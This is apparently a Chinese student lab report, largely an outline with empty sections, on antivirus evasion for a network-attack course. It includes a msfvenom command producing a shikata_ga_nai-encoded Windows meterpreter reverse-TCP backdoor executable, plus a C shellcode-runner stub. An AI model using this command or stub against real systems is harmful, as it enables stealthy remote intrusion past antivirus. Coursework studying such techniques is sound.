其他分享
首页 > 其他分享> > 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践

作者:互联网

2019-2020-2 20175227张雪莹《网络对抗技术》

Exp3 免杀原理与实践

目录

0. 基础知识

0.1 免杀
0.2 恶意软件检测机制
0.3 免杀技术(Evading AV)综述

返回目录

1. 实验内容

1.1 方法
1.1.1 正确使用msf编码器

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 52 -b '\x00' LHOST=<ip_of _linux> LPORT=5227 -f exe > zxyexptriBD.exe

-p 后面参数分别是:平台/软件/连接方式
-e 后面参数是:编码器类型
-b 后面参数是:减去16进制的0
-f 后面参数是:输出后门的格式(文件类型)
-i 后面参数是:编码的迭代次数

1.1.2 msfvenom生成如jar之类的其他文件

其中VirScan的扫描结果由“危险”转为“警告”了,检测成功几率没有jar文件高。

1.1.3 veil
1.1.4 加壳工具

其中有一个网站检出率由危险转警告了。

1.1.5 使用C + shellcode编程

unsigned char buf[] = 
"shellcode数组内容"

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

1.1.6 使用其他课堂未介绍方法

返回目录

1.2 通过组合应用各种技术实现恶意代码免杀

返回目录

1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

返回目录

2. 老师提问

2.1 杀软是如何检测出恶意代码的?
2.2 免杀是做什么?
2.3 免杀的基本方法有哪些?
2.4 开启杀软能绝对防止电脑中恶意代码吗?

返回目录

3. 所遇到的问题及其解决方法

3.1 问题1
3.2 问题2
3.3 问题3

返回目录

4. 实验感想

返回目录

5.参考资料

返回目录

标签:zxy175227,exe,张雪莹,免杀,Exp3,恶意软件,msfvenom,1.1
来源: https://www.cnblogs.com/zxy20175227/p/12559042.html